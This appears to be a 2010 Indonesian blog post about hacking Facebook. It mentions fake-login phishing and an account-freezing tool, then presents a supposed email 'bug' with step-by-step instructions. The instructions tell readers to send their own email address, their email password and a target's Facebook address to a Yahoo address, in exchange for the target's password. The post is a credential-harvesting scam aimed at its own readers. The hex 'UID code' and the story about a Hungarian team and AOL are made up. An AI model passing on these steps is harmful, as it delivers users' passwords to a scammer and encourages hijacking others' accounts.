Rabu, 17 November 2010

HACKING FACEBOOK




Belakangan fenomena hacking facebook semakin marak terjadi seiring dengan semakin populernya situs pertemanan online ini. Beberapa bugs (kesalahan/kerusakan) yang ada di situs milik Mark Zuckenberg ini tak pelak dijadikan sasaran utama para hacker dunia.

Proses hacking yang sedemikian rumitpun kini dibuat semakin sederhana. Beberapa waktu yang lalu teknik penyadapan username dan password melalui fake login kembali marak. Cara kerja sistem ini adalah dengan cara membawa user ke sebuah halaman situs yang mirip dengan halaman login Facebook, dan meminta user untuk memasukkan username dan password mereka. Dengan demikian username dan password user yang bersangkutan dapat diketahui oleh sang hacker.

Cara seperti di atas begitu populernya sehingga dapat ditemukan dengan mudah melalui search engine seperti Google. Namun cara "tradisional" tersebut kini mulai ditinggalkan, berkenaan dengan semakin pekanya pengguna internet. Cara tersebut sangat rentan untuk diketahui bahkan oleh orang awam sekalipun, yaitu dengan cara memastikan halaman yang anda akses adalah facebook.com alih-alih situs lain.

Cara-cara lain pun mulai ditemukan, seperti software-software praktis yang dapat membekukan account facebook seseorang dengan sekali klik saja. Salah satunya yang populer adalah Facebook Freezer. Dengan perangkat lunak yang kini dapat dengan mudah ditemukan di jagad maya ini (melalui search engine) pengguna dapat membekukan account facebook yang diinginkannya, sehingga account tersebut tidak lagi dapat diakses.

Baru-baru ini, sebuah tim asal Hungaria menemukan sebuah bugs baru yang berhasil mereka jebol. Cara yang mereka lakukan cukup unik dan seolah telah direncanakan untuk digunakan secara massal. Mereka membuat sebuah email dengan generator engine hasil karya mereka sendiri, yang mana engine tersebut secara otomatis akan men-generate password account Facebook yang diinginkan penggunanya. Email yang beralamat "autoreplyhacking@aol.com" ini akan mengolah informasi yang masuk di kotak masuknya secara otomatis (auto reply) dan membalas email tersebut kepada pengirim yang berisikan password account Facebook pengguna yang di-request.

Trik baru dalam dunia hacking ini merupakan sebuah gebrakan yang bisa jadi membuat Facebook kewalahan. Pasalnya bugs yang ada di Facebook hingga kini tak kunjung berhasil diperbaiki. Facebook pun telah bekerja sama dengan AOL sebagai provider email yang digunakan untuk menghentikan cyber crime teranyar tersebut. Namun hingga kini belum ada kepastian apakah hacking melalui email tersebut telah berhasil diatasi atau belum.

Berikut ini adalah cara hacking via email yang dimaksud:
1. Login ke email anda
2. Lakukan pengiriman email (compose email). Pada form isian "To:" masukkan alamat berikut: hacker_0201@yahoo.com. Pada form "Subject:" ketik “uid” tanpa tanda kutip.
Pada form message (pesan), ketik kode UID berikut:

mail.aol.com FALSE/FALSE 1020114252
6d 61 69 6c 6e 10 : [alamat email anda]
C7 CB C3 C6 84 C9 : [password email anda]
6C 61 6D 65 72 69 : [alamat email account facebook yg ingin diketahui passwordnya]

3. Setelah itu tekan tombol send. Tunggulah 1x24 jam, anda akan menerima email balasan yang berisi password account "korban". Yang perlu diingat adalah isian message haruslah sesuai seperti yang telah diberikan di atas, karena sistem ini menggunakan auto reply email yang hanya mengenali perintah berdasarkan kode yang diberikan.

---------------------------------------------------------------------------------------------------------------------------------

Saya di sini cuman mau berbagi info aja. Semoga bugs ini cepat diperbaiki ama fesbuk, biar ga ada hacking2an lagi. Ya ga ya ga?
Oiya, kita juga perlu ekstra hati2 jaman skarang. Hacker2 udah makin pinter.


diperbolehkan menyebarluas kan !!!

Hati2 ya kawandd...

Tidak ada komentar:

Poskan Komentar